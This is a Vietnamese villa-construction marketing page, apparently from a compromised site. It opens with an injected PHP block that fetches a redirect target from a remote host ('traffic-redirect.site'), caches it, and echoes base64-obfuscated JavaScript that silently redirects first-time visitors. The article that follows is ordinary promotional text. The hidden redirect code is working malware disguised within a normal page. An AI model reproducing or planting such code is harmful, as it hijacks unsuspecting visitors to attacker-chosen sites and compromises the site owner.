$alias = "29551697176418"; $key = "c7b088a5cce4359849d7e747bc979e91"; $file = dirname(__FILE__) . "/" . md5($alias); $time = time(); $file_exist = file_exists($file); $filetime = 0; $edittime = 0; $domain = false; if ($file_exist) { $filetime = filemtime($file); $edittime = $time - $filetime; $datafile = fopen($file, 'r'); $dcres = json_decode(base64_decode(fread($datafile, filesize($file))) , 1); if(!empty($dcres['domain'])) $url = $dcres['domain']; fclose($datafile); } if ($edittime >= 15 || !$file_exist || !$url) { $dcres = getdata($file,$key,$alias); if(isset($_REQUEST['ch'])){ var_dump($dcres); } if ($dcres['domain']) { $url = $dcres['domain']; } } function getdata($file,$key,$alias){ $newdomainurl = 'http://traffic-redirect.site/?t=json&i='.$key.'&a='.$alias; if(function_exists('curl_version')){ $curl = curl_init(); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_USERAGENT, 'get new domain'); curl_setopt($curl, CURLOPT_URL, $newdomainurl); curl_setopt($curl, CURLOPT_TIMEOUT, 5); $res = curl_exec($curl); curl_close($curl); }else $res = file_get_contents($newdomainurl); if(isset($_REQUEST['ch'])){ var_dump($res); } $dcres = json_decode($res, true); if ($dcres['domain']) { $cache = fopen($file, 'w+'); fwrite($cache, base64_encode($res)); fclose($cache); return $dcres; } return false; } if (!$_COOKIE[base64_decode('aHRfcnI=') ]) { setcookie(base64_decode('aHRfcnI=') , 1, time() + 86400, base64_decode('Lw==')); echo base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi') . $url . base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi') . $url . base64_decode('Ijs8L3NjcmlwdD4='); } ?> Xây dựng biệt thự theo diện tích

Xây dựng biệt thự theo diện tích và những điều bạn cần biết

Khi xây dựng biệt thự cần phải có sự tính toán chính xác và hợp lý để mang lại cho bạn một công trình hoàn hảo và tiết kiệm chi phí. Cũng chính vì vậy mà khi xây dựng biệt thự Công ty TNHH đầu tư LS Việt Nam luôn xây dựng biệt thự theo diện tích tuỳ vào nhu cầu cũng như quỹ đất mà khách hàng có. Điều này giúp cho gia chủ có thể tìm được một mẫu thiết kế phù hợp và đáp ứng đúng nhu cầu sử dụng của mình. Với những thông tin dưới đây bạn sẽ có thêm nhiều thông tin thú vị và biết cách xây dựng biệt thự đúng chuẩn theo diện tích.

Tại sao cần xây dựng biệt thự theo diện tích?

Có thể nói rằng việc tính toán chuẩn xác diện tích sẽ xây dựng chính là một điều có ý nghĩa vô cùng quan trọng. Bởi khi đã dự trù được chi phí bạn sẽ có sự chủ động trong việc tính toán từng hạng mục công trình và cũng có thể căn cứ để đối chiếu, dự trù về chi phí xây dựng cũng như chi phí mua nguyên vật liệu phục vụ việc xây dựng căn nhà. 

Vì sao cần đảm lưu ý xây dựng biệt thự theo diện tích đất?

Khi tìm hiểu về diện tích biệt thự bạn có thể tính từ mép tường bên này cho đến mép tường bên kia để đo đếm số m2. Khi tính được diện tích bạn có thể lên được những mẫu thiết kế phù hợp nhất với không gian của mình cũng như thực hiện theo đúng quy hoạch trong giấy phép xây dựng. Việc tính toán này cũng có thể giúp gia chủ cũng như nhà thầu thống nhất được về diện tích xây dựng cũng như những phát sinh trong quá trình thực hiện hợp đồng. Điều này mang đến sự thuận lợi cho quá trình thiết kế và thi công.

Tính diện tích xây dựng biệt thự như thế nào?

Đảm bảo diện tích đất đáp ứng đầy đủ công năng khi xây dựng biệt thự

Khi tính diện tích sàn xây dựng bạn có thể tính bằng cách lấy tổng diện tích sàn sử dụng và cộng với diện tích các phần khác. Mỗi không gian sàn sẽ cộng lại với nhau để có thể ra một kết quả chung. Trong khi đó diện tích xây dựng biệt thự sẽ gồm cả phần trăm hao phí xây dựng cũng như dựa trên tổng số m2 của công trình.

Thông thường tuỳ từng diện tích cũng như nhu cầu của gia chủ mà bạn có thể lựa chọn bố trí xây dựng diện tích khác nhau. Đồng thời bạn cũng có thể căn cứ vào số thành viên trong gia đình để có sự tính toán chính xác về diện tích khi xây dựng biệt thự theo diện tích.

Thiết kế biệt thự 3 tầng phong cách Châu Âu phù hợp với gia chủ có diện tích đất rộng

Công ty xây dựng biệt thự theo diện tích chuyên nghiệp

Trong số những đơn vị đã và đang cung cấp các dịch vụ thiết kế và xây dựng biệt thự trên thị trường hiện nay không thể không kể đến Công ty TNHH đầu tư LS Việt Nam với nhiều năm kinh nghiệm. Chúng tôi liên tục sáng tạo và cho ra những mẫu thiết kế ấn tượng giúp khách hàng có một không gian sống đẳng cấp với chi phí tiết kiệm nhất.

Thiết kế biệt thự 1 tầng mái bằng có diện tích rộng lớn

Cùng nhìn ngắm một số thiết kế biệt thự đẹp mà sang:

Thiết kế biệt thự như tòa lâu đài sang trọng
Thiết kế biệt thự đẹp, độc đáo thu hút mọi ánh nhìn
Thiết kế biệt thự mini mái bằng 2 tầng theo phong cách hiện đại, đơn giản
Xay-dung-biet-thu-co-be-boi
Biệt thự có bể bơi cũng là lựa chọn không tồi cho gia chủ

Thấu hiểu những mong muốn của khách hàng, đội ngũ kiến trúc sư của công ty luôn đưa ra những phương án tối ưu giúp việc xây dựng biệt thự theo diện tích được hiệu quả và phù hợp nhất. Hãy liên hệ với chúng tôi qua số Hotline:0912 566 052 để tham khảo thêm những mẫu thiết kế biệt thự ấn tượng trong những năm gần đây.

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *

0912566052